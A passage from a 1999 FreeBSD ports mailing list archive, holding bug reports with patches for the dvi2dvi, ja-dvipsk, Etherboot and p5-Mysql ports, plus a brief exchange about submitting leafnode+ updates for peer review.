+--- Makefile.orig Fri Sep 3 22:01:59 1999 ++++ Makefile Tue Nov 30 04:16:41 1999 @@ -2,10 +2,10 @@ # your site: # @@ -13,16 +13,24 @@ # # name of default fontdesc file in your site FONTDESC=fontdesc -@@ -15,10 +15,10 @@ +@@ -13,16 +13,16 @@ + DVI2PATH=.:${DVI2LIB} + + # kpathsea +-KPSEINCLUDE = -I/usr/local/include -DKPATHSEA +-KPSELIB = -L/usr/local/lib -lkpathsea ++KPSEINCLUDE = -I${kpathsea_parent} -DKPATHSEA ++KPSELIB = -L${kpathsea_parent}/kpathsea/STATIC -lkpathsea + # - CC=cc + CC=gcc # --CFLAGS = -g -+#CFLAGS = -g - #CFLAGS = -O # SUN etc ... - #CFLAGS = -O -traditional -DPOSIX # 386bsd (gcc 1.X) --#CFLAGS = -O -DPOSIX # Netbsd (gcc 2.X), Linux -+CFLAGS += -DPOSIX # Netbsd (gcc 2.X), Linux - #CFLAGS = -O -bsd # NeXT - #CFLAGS = -O -DMSDOS -DPOSIX # DJGCC (gcc 2.X) - #CFLAGS = -O -DSYSV # SysV +-CCFLAGS = -g ++#CCFLAGS = -g + #CCFLAGS = -O # SUN etc ... + #CCFLAGS = -O -traditional -DPOSIX # 386bsd (gcc 1.X) +-#CCFLAGS = -O -DPOSIX # Netbsd (gcc 2.X), Linux ++CCFLAGS += -O -DPOSIX # Netbsd (gcc 2.X), Linux + #CCFLAGS = -O -bsd # NeXT + #CCFLAGS = -O -DMSDOS -DPOSIX # DJGCC (gcc 2.X) + #CCFLAGS = -O -DSYSV # SysV diff -ruN dvi2dvi.orig/patches/patch-ab dvi2dvi/patches/patch-ab --- dvi2dvi.orig/patches/patch-ab Tue Dec 22 00:59:00 1998 +++ dvi2dvi/patches/patch-ab Tue Nov 30 04:46:49 1999 @@ -1,13 +1,17 @@ ---- lib/a2n.orig Sun Apr 30 14:54:32 1995 -+++ lib/a2n Mon Dec 21 19:31:33 1998 -@@ -3,7 +3,8 @@ - # configuration - fontdesc config +--- lib/fonts/a2n.orig Sat Jun 13 02:53:19 1998 ++++ lib/fonts/a2n Tue Nov 30 04:19:25 1999 +@@ -1,4 +1,4 @@ # min,goth -> dm,dg -font jvf * 0 $af/vf-a2n/%f.vf +font jvf * 0 $vf/vf-a2n/%f.vf - # - # tfm used in the above vf (NTT subfont tfm, i.e. dmjsys10.tfm ...) --font tfm * 0 $nsf/tfm/%f.tfm -+font tfm * 0 $nsf/mincho/%f.tfm -+font tfm * 0 $nsf/gothic/%f.tfm + font decomp * 0 dm,ntt + font decomp * 0 dg,ntt +--- lib/fontsk/a2n.orig Sat Jun 13 02:53:09 1998 ++++ lib/fontsk/a2n Tue Nov 30 04:21:27 1999 +@@ -1,5 +1,5 @@ + # min,goth -> dm,dg +-font jvf * 0 $tmf/vf//a2n/ ++font jvf * 0 $vf/vf-a2n/ + font decomp * 0 dm,ntt + font decomp * 0 dg,ntt + diff -ruN dvi2dvi.orig/patches/patch-ac dvi2dvi/patches/patch-ac --- dvi2dvi.orig/patches/patch-ac Tue Dec 22 00:59:00 1998 +++ dvi2dvi/patches/patch-ac Tue Nov 30 04:46:49 1999 @@ -1,5 +1,5 @@ ---- lib/config.orig Sun Apr 30 14:50:47 1995 -+++ lib/config Mon Dec 21 19:31:33 1998 +--- lib/config.orig Mon May 1 03:50:47 1995 ++++ lib/config Tue Nov 30 04:17:43 1999 @@ -1,3 +1,4 @@ -define f /usr/local/lib/tex/fonts -define nsf /usr/local/lib/tex/jfonts @@ -7,4 +7,11 @@ +define f @PREFIX@/share/tex/fonts +define nsf @PREFIX@/share/tex/jfonts +define af @PREFIX@/share/texmf/fonts ++define vf @PREFIX@/share/fonts +--- lib/configk.orig Mon Jun 8 01:24:46 1998 ++++ lib/configk Tue Nov 30 04:17:44 1999 +@@ -1 +1,3 @@ +-define tmf /usr/local/share/texmf/fonts ++define tmf @PREFIX@/share/texmf/fonts ++define nsf @PREFIX@/share/tex/jfonts +define vf @PREFIX@/share/fonts diff -ruN dvi2dvi.orig/patches/patch-ad dvi2dvi/patches/patch-ad --- dvi2dvi.orig/patches/patch-ad Tue Dec 22 00:59:00 1998 +++ dvi2dvi/patches/patch-ad Tue Nov 30 04:46:49 1999 @@ -1,13 +1,17 @@ ---- lib/n2a.orig Sun Apr 30 14:53:22 1995 -+++ lib/n2a Mon Dec 21 19:31:33 1998 -@@ -3,7 +3,8 @@ - # configuration - fontdesc config +--- lib/fonts/n2a.orig Mon Jun 8 01:15:57 1998 ++++ lib/fonts/n2a Tue Nov 30 04:19:28 1999 +@@ -1,4 +1,4 @@ # virtual font -font vf * 0 $nsf/vf-n2a/%f.vf +font vf * 0 $vf/vf-n2a/%f.vf - # # tfm used in the above vf (ASCII jfm, i.e. min10.tfm ...) -font jfm * 0 $af/jfm/%f.tfm +font jfm * 0 $af/tfm/ptex/%f.tfm -+font jfm * 0 $nsf/jfms/%f.tfm +--- lib/fontsk/n2a.orig Mon Jun 8 01:31:48 1998 ++++ lib/fontsk/n2a Tue Nov 30 04:21:32 1999 +@@ -1,4 +1,4 @@ + # virtual font +-font vf * 0 $tmf/vf//n2a/ ++font vf * 0 $vf/vf-n2a/ + # tfm used in the above vf (ASCII jfm, i.e. min10.tfm ...) + font jfm * 0 $tmf/tfm//ptex/ diff -ruN dvi2dvi.orig/patches/patch-ae dvi2dvi/patches/patch-ae --- dvi2dvi.orig/patches/patch-ae Tue Dec 22 00:59:00 1998 +++ dvi2dvi/patches/patch-ae Tue Nov 30 04:46:49 1999 @@ -1,16 +1,16 @@ ---- lib/p2n.orig Mon Jun 26 10:02:01 1995 -+++ lib/p2n Mon Dec 21 19:31:33 1998 -@@ -3,20 +3,21 @@ - # configuration - fontdesc config +--- lib/fonts/p2n.orig Sat Jun 20 05:16:50 1998 ++++ lib/fonts/p2n Tue Nov 30 04:19:33 1999 +@@ -1,20 +1,21 @@ # min,goth -> dm,dg -font jvf * 0 $af/vf-a2n/%f.vf +font jvf * 0 $vf/vf-a2n/%f.vf # tmin,tgoth -> dm,dg + d?jsy in vertical mode -font jvf * 0 $af/vf-p2pn/%f.vf +font jvf * 0 $vf/vf-p2pn/%f.vf + font decomp * 0 dm,ntt + font decomp * 0 dg,ntt # - # tfm used in the above vf (NTT subfont tfm, i.e. dmjsy10.tfm ...) + # tfm of NTT subfont (dmjsy10.tfm ...) -font tfm * 0 $nsf/tfm/%f.tfm +font tfm * 0 $nsf/mincho/%f.tfm +font tfm * 0 $nsf/gothic/%f.tfm @@ -20,12 +20,43 @@ -vfont vf * 0 $af/vf-tjsy/%f.vf +vfont vf * 0 $vf/vf-tjsy/%f.vf # cmr.. -> rcmr.. --define gen $f/vf-rot -+define gen $vf/vf-rot - vfont vf * 0 $gen/%f.vf +-define rotdir $f/vf-rot ++define rotdir $vf/vf-rot + vfont vf * 0 $rotdir/%f.vf vfont func * 0 \ - exist($f/tfm/%f.tfm),\ -- exec(/usr/local/lib/mkrotvf %f r%f $f/tfm/%f.tfm $gen/),\ +- exec(/usr/local/lib/mkrotvf %f r%f $f/tfm/%f.tfm $rotdir/),\ + exist($f/%f.tfm),\ -+ exec(@PREFIX@/bin/mkrotvf %f r%f $f/%f.tfm $gen/),\ - vf($gen/%f.vf) ++ exec(@PREFIX@/bin/mkrotvf %f r%f $f/%f.tfm $rotdir/),\ + vf($rotdir/%f.vf) +--- lib/fontsk/p2n.orig Sat Jun 20 05:18:04 1998 ++++ lib/fontsk/p2n Tue Nov 30 04:21:38 1999 +@@ -1,21 +1,22 @@ + # min,goth -> dm,dg +-font jvf * 0 $tmf/vf//a2n/ ++font jvf * 0 $vf/vf-a2n/ + # tmin,tgoth -> dm,dg + d?jsy in vertical mode +-font jvf * 0 $tmf/vf//p2pn/ ++font jvf * 0 $vf/vf-p2pn/ + font decomp * 0 dm,ntt + font decomp * 0 dg,ntt + # + # tfm of NTT subfont (dmjsy10.tfm ...) +-font tfm * 0 $tmf/tfm//nttsub/ ++font tfm * 0 $nsf/mincho/ ++font tfm * 0 $nsf/gothic/ + # + # convert fonts in vertical mode to fonts with rotated bitmap + # dmjsy.. -> tdmjsy.. +-vfont vf * 0 $tmf/vf//tjsy/ ++vfont vf * 0 $vf/vf-tjsy/ + # cmr.. -> rcmr.. +-define rotdir $tfm/vf/ptex/rot/ ++define rotdir $vf/vf-rot/ + vfont vf * 0 $rotdir + vfont func * 0 \ + exist($tmf/tfm//%f.tfm),\ +- exec(/usr/local/lib/mkrotvf %f r%f `kpsewhich -path=$tmf/tfm// %f.tfm`\ ++ exec(@PREFIX@/bin/mkrotvf %f r%f `kpsewhich -path=$tmf/tfm// %f.tfm`\ + $rotdir),\ + vf($rotdir) diff -ruN dvi2dvi.orig/patches/patch-af dvi2dvi/patches/patch-af --- dvi2dvi.orig/patches/patch-af Tue Dec 22 00:59:00 1998 +++ dvi2dvi/patches/patch-af Tue Nov 30 04:46:49 1999 @@ -1,23 +1,40 @@ ---- lib/p2pn.orig Fri May 5 14:14:20 1995 -+++ lib/p2pn Mon Dec 21 19:31:33 1998 -@@ -3,15 +3,16 @@ - # configuration - fontdesc config +--- lib/fonts/p2pn.orig Sat Jun 13 03:03:38 1998 ++++ lib/fonts/p2pn Tue Nov 30 04:19:35 1999 +@@ -1,14 +1,15 @@ # min,goth -> dm,dg -font jvf * 0 $af/vf-a2n/%f.vf +font jvf * 0 $vf/vf-a2n/%f.vf # tmin,tgoth -> dm,dg + d?jsy in vertical mode -font jvf * 0 $af/vf-p2pn/%f.vf +font jvf * 0 $vf/vf-p2pn/%f.vf + font decomp * 0 dm,ntt + font decomp * 0 dg,ntt # - # tfm used in the above vf (NTT subfont tfm, i.e. dmjsy10.tfm ...) + # tfm of NTT subfont (dmjsy10.tfm ...) -font tfm * 0 $nsf/tfm/%f.tfm +font tfm * 0 $nsf/mincho/%f.tfm +font tfm * 0 $nsf/gothic/%f.tfm - # # tfm of ascii font -font tfm * 0 $f/tfm/%f.tfm +font tfm * 0 $f/%f.tfm # ptex special vert "ps:gsave currentpoint currentpoint translate 90 rotate neg exch neg exch translate" ptex special end "ps:currentpoint grestore moveto" +--- lib/fontsk/p2pn.orig Sat Jun 13 03:02:00 1998 ++++ lib/fontsk/p2pn Tue Nov 30 04:21:39 1999 +@@ -1,11 +1,13 @@ + # min,goth -> dm,dg +-font jvf * 0 $tmf/vf//a2n/ ++font jvf * 0 $vf/vf-a2n/ + # tmin,tgoth -> dm,dg + d?jsy in vertical mode +-font jvf * 0 $tmf/vf//p2pn/ ++font jvf * 0 $vf/vf-p2pn/ + font decomp * 0 dm,ntt + font decomp * 0 dg,ntt + # + # tfm of all fonts ++font tfm * 0 $nsf/mincho/ ++font tfm * 0 $nsf/gothic/ + font tfm * 0 $tmf/tfm// + # + ptex special vert "ps:gsave currentpoint currentpoint translate 90 rotate neg exch neg exch translate" diff -ruN dvi2dvi.orig/pkg/PLIST dvi2dvi/pkg/PLIST --- dvi2dvi.orig/pkg/PLIST Tue Dec 22 00:59:00 1998 +++ dvi2dvi/pkg/PLIST Tue Nov 30 04:46:49 1999 @@ -1,8 +1,17 @@ bin/dvi2dvi lib/dvi2dvi/a2n lib/dvi2dvi/config +lib/dvi2dvi/configk lib/dvi2dvi/fontdesc -lib/dvi2dvi/mtex +lib/dvi2dvi/fonts/a2n +lib/dvi2dvi/fonts/n2a +lib/dvi2dvi/fonts/p2n +lib/dvi2dvi/fonts/p2pn +lib/dvi2dvi/fontsk/a2n +lib/dvi2dvi/fontsk/n2a +lib/dvi2dvi/fontsk/p2n +lib/dvi2dvi/fontsk/p2pn +lib/dvi2dvi/multex lib/dvi2dvi/n2a lib/dvi2dvi/n2w lib/dvi2dvi/p2n @@ -14,5 +23,7 @@ share/doc/dvi2dvi/install.doc share/doc/dvi2dvi/lib.doc @exec mkdir -p -m 777 %D/share/fonts/vf-rot +@dirrm lib/dvi2dvi/fonts +@dirrm lib/dvi2dvi/fontsk @dirrm lib/dvi2dvi @dirrm share/doc/dvi2dvi >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 15:10: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C7D0154D5 for ; Mon, 29 Nov 1999 15:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA58518; Mon, 29 Nov 1999 15:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A99AC152C8; Mon, 29 Nov 1999 15:01:44 -0800 (PST) Message-Id: <19991129230144.A99AC152C8@hub.freebsd.org> Date: Mon, 29 Nov 1999 15:01:44 -0800 (PST) From: watanabe@zlab.phys.nagoya-u.ac.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15172: Missing scripts files of ja-dvipsk-* ports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15172 >Category: ports >Synopsis: Missing scripts files of ja-dvipsk-* ports >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 15:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Makoto WATANABE >Release: FreeBSD 3.2-RELEASE i386 >Organization: Z lab. Division of Particle and Astrophysical Science, Nagoya University, JAPAN >Environment: >Description: Because the 'ja-dvipsk-*' ports have missed the scripts/post-configure files, please add these files. I put the patches for 'japanese/dvipsk' and 'japanese/dvipsk-vflib' below "Fix:". Added files are dvipsk/scripts/post-configure dvipsk-vflib/scripts/post-configure - Makoto WATANABE watanabe@zlab.phys.nagoya-u.ac.jp >How-To-Repeat: >Fix: diff -ruN dvipsk.orig/scripts/post-configure dvipsk/scripts/post-configure --- dvipsk.orig/scripts/post-configure Thu Jan 1 09:00:00 1970 +++ dvipsk/scripts/post-configure Tue Nov 30 07:32:54 1999 @@ -0,0 +1,13 @@ +#!/bin/sh + +chgdirs=". kpathsea dvipsk" + +cd ${WRKSRC} + +for dir in ${chgdirs}; do + ${MV} -f ${dir}/Makefile ${dir}/Makefile.bak + ${SED} \ + -e 's@^prefix[ ]*=.*$@prefix=${PREFIX}@' \ + -e 's@^texmf[ ]*=.*$@texmf=${PREFIX}/share/texmf@' \ + < ${dir}/Makefile.bak > ${dir}/Makefile +done diff -ruN dvipsk-vflib.orig/scripts/post-configure dvipsk-vflib/scripts/post-configure --- dvipsk-vflib.orig/scripts/post-configure Thu Jan 1 09:00:00 1970 +++ dvipsk-vflib/scripts/post-configure Tue Nov 30 07:32:54 1999 @@ -0,0 +1,13 @@ +#!/bin/sh + +chgdirs=". kpathsea dvipsk" + +cd ${WRKSRC} + +for dir in ${chgdirs}; do + ${MV} -f ${dir}/Makefile ${dir}/Makefile.bak + ${SED} \ + -e 's@^prefix[ ]*=.*$@prefix=${PREFIX}@' \ + -e 's@^texmf[ ]*=.*$@texmf=${PREFIX}/share/texmf@' \ + < ${dir}/Makefile.bak > ${dir}/Makefile +done >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 15:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C70BF14A24 for ; Mon, 29 Nov 1999 15:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA61539; Mon, 29 Nov 1999 15:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 15:50:02 -0800 (PST) Message-Id: <199911292350.PAA61539@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Will Andrews Subject: RE: ports/15170: Update Port: leafnode+ Reply-To: Will Andrews Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15170; it has been noted by GNATS. From: Will Andrews To: tom@FreeBSD.ORG Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: RE: ports/15170: Update Port: leafnode+ Date: Mon, 29 Nov 1999 18:43:50 -0500 (EST) On 29-Nov-99 tom@FreeBSD.ORG wrote: ^^^^^^^^^^^^^^^ > The following patch updates the leafnode+ port. I am the port's > maintainer. > > No files have been added/removed to/from the port. If you're a committer, why don't you just commit instead of sending a PR to -ports? The only reason (it seems to me) that any committer with a port would send a message through gnats "requesting an update" is to get feedback from -ports people. Otherwise, it's just extra traffic. Do you need help with this port or something? No offense intended, just thought this was a peculiar PR. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 16:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 304C415592 for ; Mon, 29 Nov 1999 16:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA63195; Mon, 29 Nov 1999 16:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from alpo.whistle.com (alpo.whistle.com [207.76.204.38]) by hub.freebsd.org (Postfix) with ESMTP id 5BC8515508 for ; Mon, 29 Nov 1999 16:01:25 -0800 (PST) (envelope-from ambrisko@whistle.com) Received: from whistle.com (crab.whistle.com [207.76.205.112]) by alpo.whistle.com (8.9.1a/8.9.1) with ESMTP id QAA64974 for ; Mon, 29 Nov 1999 16:01:25 -0800 (PST) Received: (from ambrisko@localhost) by whistle.com (8.9.1/8.9.1) id QAA56895; Mon, 29 Nov 1999 16:00:59 -0800 (PST) (envelope-from ambrisko) Message-Id: <199911300000.QAA56895@whistle.com> Date: Mon, 29 Nov 1999 16:00:59 -0800 (PST) From: Doug Ambrisko Reply-To: ambrisko@whistle.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15173: Update Etherboot 4.2.11 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15173 >Category: ports >Synopsis: Update Etherboot 4.2.11 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 16:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Doug Ambrisko >Release: FreeBSD 4.0-CURRENT i386 >Organization: Whistle >Environment: >Description: New release of Etherboot 4.2.11 which for one compiles out of the box on FreeBSD except for the binutil issue. Fixup an issue in which NASM wasn't being used to build some of the x86 code. Point the backup archive site to my site, since binutils has disappeared from the Linux master sites. >How-To-Repeat: >Fix: Note this patch nukes patch-ac (makes is a zero length file). Index: Makefile =================================================================== RCS file: /cvs/freebsd/ports/net/etherboot/Makefile,v retrieving revision 1.7 diff -c -r1.7 Makefile *** Makefile 1999/11/26 18:17:03 1.7 --- Makefile 1999/11/30 00:01:16 *************** *** 1,16 **** # New ports collection makefile for: etherboot ! # Version required: 4.2.9 # Date created: 16 April 1999 # Whom: Doug Ambrisko # # $FreeBSD: ports/net/etherboot/Makefile,v 1.6 1999/09/27 02:23:47 steve Exp $ # ! DISTNAME= etherboot-4.2.9 PKGNAME= etherboot-4.2 CATEGORIES= net MASTER_SITES= http://www.slug.org.au/etherboot/ \ ! http://www.us.kernel.org/pub/linux/devel/gcc/ DISTFILES= ${DISTNAME}.tar.gz ${BINUTILS_VER}.tar.gz MAINTAINER= ambrisko@whistle.com --- 1,17 ---- # New ports collection makefile for: etherboot ! # Version required: 4.2.11 # Date created: 16 April 1999 # Whom: Doug Ambrisko # # $FreeBSD: ports/net/etherboot/Makefile,v 1.6 1999/09/27 02:23:47 steve Exp $ # ! DISTNAME= etherboot-4.2.11 PKGNAME= etherboot-4.2 CATEGORIES= net MASTER_SITES= http://www.slug.org.au/etherboot/ \ ! http://www.us.kernel.org/pub/linux/devel/gcc/ \ ! http://www.ambrisko.com/doug/ DISTFILES= ${DISTNAME}.tar.gz ${BINUTILS_VER}.tar.gz MAINTAINER= ambrisko@whistle.com Index: files/md5 =================================================================== RCS file: /cvs/freebsd/ports/net/etherboot/files/md5,v retrieving revision 1.3 diff -c -r1.3 md5 *** md5 1999/11/26 18:17:09 1.3 --- md5 1999/11/30 00:01:16 *************** *** 1,2 **** ! MD5 (etherboot-4.2.9.tar.gz) = 3af0e7dbd0e094ebfd287f9639b60722 MD5 (binutils-2.9.1.0.25.tar.gz) = 2350a282f8fd53b409f523e77fccb904 --- 1,2 ---- ! MD5 (etherboot-4.2.11.tar.gz) = 9fe7c9a689dfbb7f90b7afa453922598 MD5 (binutils-2.9.1.0.25.tar.gz) = 2350a282f8fd53b409f523e77fccb904 Index: patches/patch-aa =================================================================== RCS file: /cvs/freebsd/ports/net/etherboot/patches/patch-aa,v retrieving revision 1.3 diff -c -r1.3 patch-aa *** patch-aa 1999/11/26 18:17:11 1.3 --- patch-aa 1999/11/30 00:01:16 *************** *** 1,5 **** ! *** Makefile.orig Fri Oct 22 09:17:37 1999 ! --- Makefile Fri Oct 22 09:18:27 1999 *************** *** 74,79 **** --- 74,80 ---- --- 1,5 ---- ! *** Makefile.orig Thu Nov 25 00:34:35 1999 ! --- Makefile Mon Nov 29 14:25:36 1999 *************** *** 74,79 **** --- 74,80 ---- *************** *** 10,12 **** --- 10,46 ---- IDENT= 'Etherboot/$(BITS) $(VERSION) (GPL) $@' # Stack must be below 640kb so we have real memory there + *************** + *** 102,108 **** + + # Exactly one of the following definitions for AS86 should be uncommented + # If you have not made any changes to the *.asm files (most people) + ! AS86= none + # If you have made changes to the *.asm files + # and you want to rebuild *loader.bin and floppyload.bin and you have as86 + # from the ELKS Dev86 package (not the one that normally comes with Linux) + --- 103,109 ---- + + # Exactly one of the following definitions for AS86 should be uncommented + # If you have not made any changes to the *.asm files (most people) + ! #AS86= none + # If you have made changes to the *.asm files + # and you want to rebuild *loader.bin and floppyload.bin and you have as86 + # from the ELKS Dev86 package (not the one that normally comes with Linux) + *************** + *** 111,117 **** + # If you have made changes to the *.asm files + # and you want to rebuild *loader.bin and floppyload.bin and you have nasm + # (not most people) + ! #AS86= nasm + + # if your as has trouble with the data32 directive, uncomment this + # but note that the premade start*.o will be larger than necessary because it + --- 112,118 ---- + # If you have made changes to the *.asm files + # and you want to rebuild *loader.bin and floppyload.bin and you have nasm + # (not most people) + ! AS86= nasm + + # if your as has trouble with the data32 directive, uncomment this + # but note that the premade start*.o will be larger than necessary because it Index: patches/patch-ac =================================================================== RCS file: /cvs/freebsd/ports/net/etherboot/patches/patch-ac,v retrieving revision 1.2 diff -c -r1.2 patch-ac *** patch-ac 1999/11/26 18:17:11 1.2 --- patch-ac 1999/11/30 00:01:16 *************** *** 1,14 **** - *** 3c90x.c.orig Fri Oct 22 09:27:33 1999 - --- 3c90x.c Fri Oct 22 09:28:23 1999 - *************** - *** 36,42 **** - --- 36,44 ---- - - #include "etherboot.h" - #include "nic.h" - + #ifndef __FreeBSD__ - #include - + #endif - - #define TIME_OUT 60000 - #define XCVR_MAGIC (0x5A00) --- 0 ---- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 16:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5037D14BEF for ; Mon, 29 Nov 1999 16:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA65219; Mon, 29 Nov 1999 16:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 16:40:02 -0800 (PST) Message-Id: <199911300040.QAA65219@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Tom Hukins Subject: Re: ports/15170: Update Port: leafnode+ Reply-To: Tom Hukins Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15170; it has been noted by GNATS. From: Tom Hukins To: Will Andrews Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15170: Update Port: leafnode+ Date: Tue, 30 Nov 1999 00:30:48 +0000 On Mon, Nov 29, 1999 at 06:43:50PM -0500, Will Andrews wrote: > > If you're a committer, why don't you just commit instead of sending a PR to > -ports? The only reason (it seems to me) that any committer with a port would > send a message through gnats "requesting an update" is to get feedback from > -ports people. Otherwise, it's just extra traffic. The Wraith has asked me to submit any changes to the ports tree for peer review. > Do you need help with this port or something? No, I'm just doing what I'm told! ;-) > No offense intended, just thought this was a peculiar PR. None taken. Regards, Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 18: 0:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6237515698 for ; Mon, 29 Nov 1999 18:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA71675; Mon, 29 Nov 1999 18:00:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id CB3B51567F for ; Mon, 29 Nov 1999 17:52:03 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 0486E9B36; Mon, 29 Nov 1999 20:52:02 -0500 (EST) Message-Id: <19991130015202.0486E9B36@pawn.primelocation.net> Date: Mon, 29 Nov 1999 20:52:02 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15176: Update port: databases/p5-Mysql Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15176 >Category: ports >Synopsis: Update port: databases/p5-Mysql >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 18:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: Update port: databases/p5-Mysql * Add RUN_DEPENDS to fix ports/15153 * Add Y2K link >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/databases/p5-Mysql/Makefile,v retrieving revision 1.23 diff -u -r1.23 Makefile --- Makefile 1999/11/27 05:00:17 1.23 +++ Makefile 1999/11/30 01:49:06 @@ -14,9 +14,12 @@ MAINTAINER= jedgar@fxp.org +Y2K= http://forteviot.symbolstone.org/technology/perl/DBI/doc/faq.html + BUILD_DEPENDS= ${LOCALBASE}/lib/perl5/site_perl/${PERL_VER}/Data/ShowTable.pm:${PORTSDIR}/devel/p5-Data-ShowTable \ ${LOCALBASE}/lib/perl5/site_perl/${PERL_VER}/${PERL_ARCH}/DBI.pm:${PORTSDIR}/databases/p5-DBI LIB_DEPENDS= mysqlclient.6:${PORTSDIR}/databases/mysql322-client +RUN_DEPENDS= ${BUILD_DEPENDS} CONFIGURE_ARGS= PREFIX=${PREFIX} --noprompt --mysql-install --nomsql-install CONFIGURE_ENV= MYSQL_HOME=${PREFIX} IN_MYSQL_DISTRIBUTION=1 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 21: 0:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 74AEF14D15 for ; Mon, 29 Nov 1999 21:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA89241; Mon, 29 Nov 1999 21:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 00E5614C59; Mon, 29 Nov 1999 20:52:22 -0800 (PST) Message-Id: <19991130045222.00E5614C59@hub.freebsd.org> Date: Mon, 29 Nov 1999 20:52:22 -0800 (PST) From: james@ja.ath.cx To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15177: not able to set CC in port, graphics/mpeg2codec Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk 